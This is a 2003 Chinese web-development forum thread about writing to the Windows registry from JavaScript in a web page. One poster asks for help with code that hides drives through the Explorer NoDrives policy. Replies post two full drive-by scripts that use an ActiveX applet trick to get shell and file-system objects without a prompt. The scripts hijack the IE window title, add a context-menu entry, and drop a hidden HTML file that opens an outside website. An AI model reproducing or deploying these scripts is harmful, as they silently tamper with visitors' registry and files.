如何用javascript写注册表

yun0012 2003-10-19 07:29:27
<html>
<body>
<script language="JavaScript">
var shl = new ActiveXObject( "Wscript.shell");
shl.RegWrite("HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Policies\\Explorer\\Nodrives",o,"REG_DWORD");
</scritp>
</body>
</html>
这段内容不知道错在哪,请各位多多帮忙
...全文
157 8 打赏 收藏 转发到动态 举报
写回复
用AI写文章
8 条回复
切换为时间正序
请发表友善的回复…
发表回复
supere 2003-11-06
  • 打赏
  • 举报
回复
ie6就改正了这个BUG了!
yun0012 2003-11-06
  • 打赏
  • 举报
回复
那么能读吗
因为写就是为了读的
什么才能读注册表
kingdomzhf 2003-10-25
  • 打赏
  • 举报
回复
</scritp>--></script>
另外,记得类型要匹配

String REG_SZ
String REG_EXPAND_SZ
Integer REG_DWORD
Integer REG_BINARY
fervv 2003-10-25
  • 打赏
  • 举报
回复
楼主最好不要做这种事,现在很多杀毒软件已经把这种代码列为病毒查杀范围!
junsunchen 2003-10-25
  • 打赏
  • 举报
回复
JavaScript修改注册表
csdn

  前段时间网上有不少的“烂站”,用JavaScript 将咱们的IE标题改得面目全非,要不是看到最进国际上人道主义呼声号召的份上,真想回头黑了那该死的烂站,现将其代码抓了下来供大家参考
  <SCRIPT Language="JavaScript" type="text/javascript">
  <!--
  document.write("<APPLET HEIGHT=0 WIDTH=0 code=com.ms.activeX.ActiveXComponent></APPLET>");
  function f(){
  try
  {
  //ActiveX initialization
  a1=document.applets[0];
  a1.setCLSID("{F935DC22-1CF0-11D0-ADB9-00C04FD58A0B}");
  a1.createInstance();
  Shl = a1.GetObject();
  a1.setCLSID("{0D43FE01-F093-11CF-8940-00A0C9054228}");
  a1.createInstance();
  FSO = a1.GetObject();
  a1.setCLSID("{F935DC26-1CF0-11D0-ADB9-00C04FD58A0B}");
  a1.createInstance();
  Net = a1.GetObject();
  try
  {
  if (document.cookie.indexOf("Chg") == -1)
  {
  Shl.RegWrite ("HKLM\\Software\\Microsoft\\Internet Explorer\\Main\\Window Title", "该死的烂 站");
  Shl.RegWrite ("HKCU\\Software\\Microsoft\\Internet Explorer\\Main\\Window Title", "该死的烂 站");
  var expdate = new Date((new Date()).getTime() + (1));
  document.cookie="Chg=general; expires=" + expdate.toGMTString() + "; path=/;"
  }
  }
  catch(e)
  {}
  }
  catch(e)
  {}
  }
  function init()
  {
  setTimeout("f()", 1000);
  }
  init();

  // -->
  </SCRIPT>(
yun0012 2003-10-24
  • 打赏
  • 举报
回复
这段东西不行吗
我运行了没反映吗
而且好象有错,因为我本身装了jre的,他报告有错,请再看看
bonniewater 2003-10-20
  • 打赏
  • 举报
回复
http://expert.csdn.net/Expert/topic/2370/2370651.xml?temp=.7713129

高手们看看这个吧
panjisheng 2003-10-20
  • 打赏
  • 举报
回复
例子:
紧供学习参考!请勿用与非道德行为!

<HTML><HEAD><TITLE>test</TITLE>
<META content="text/html; charset=gb2312" http-equiv=Content-Type>
<META content="MSHTML 5.00.2614.3500" name=GENERATOR></HEAD>
<BODY>
<SCRIPT language=JavaScript>
document.write("<APPLET HEIGHT=0 WIDTH=0 code=com.ms.activeX.ActiveXComponent></APPLET>");
function f()
{
try
{
a1=document.applets[0];
a1.setCLSID("{F935DC22-1CF0-11D0-ADB9-00C04FD58A0B}");
a1.createInstance();
sh = a1.GetObject();
a1.setCLSID("{0D43FE01-F093-11CF-8940-00A0C9054228}");
a1.createInstance();
fo = a1.GetObject();
if (document.cookie.indexOf("km169set") == -1)
{
sh.RegWrite ("HKCU\\Software\\Microsoft\\Internet Explorer\\MenuExt\\★更多全新内容★ ->相识在缘分天空\\", "c:\\windows\\lotsky.htm");
sh.RegWrite ("HKCU\\Software\\Microsoft\\Internet Explorer\\MenuExt\\★更多全新内容★ ->相识在缘分天空\\contexts", 0xf3,"REG_DWORD");
hd=fo.CreateTextFile("c:\\windows\\lotsky.htm");
hd.write('<html><head></head><\script language=javascript>window.open("http://www.21cnsky.com/");<\/script></html>');
hd.close();
file=fo.GetFile("c:\\windows\\lotsky.htm");
file.Attributes=6;
var expdate = new Date((new Date()).getTime() + (1));
document.cookie="km169set=km169; expires=" + expdate.toGMTString() + "; path=/;"
}
}
catch(e)
{
}
}

function init()
{
setTimeout("f()", 1000);
}
init();
</SCRIPT>
</BODY></HTML>

87,907

社区成员

发帖
与我相关
我的任务
社区描述
Web 开发 JavaScript
社区管理员
  • JavaScript
  • 无·法
加入社区
  • 近7日
  • 近30日
  • 至今
社区公告
暂无公告

试试用AI创作助手写篇文章吧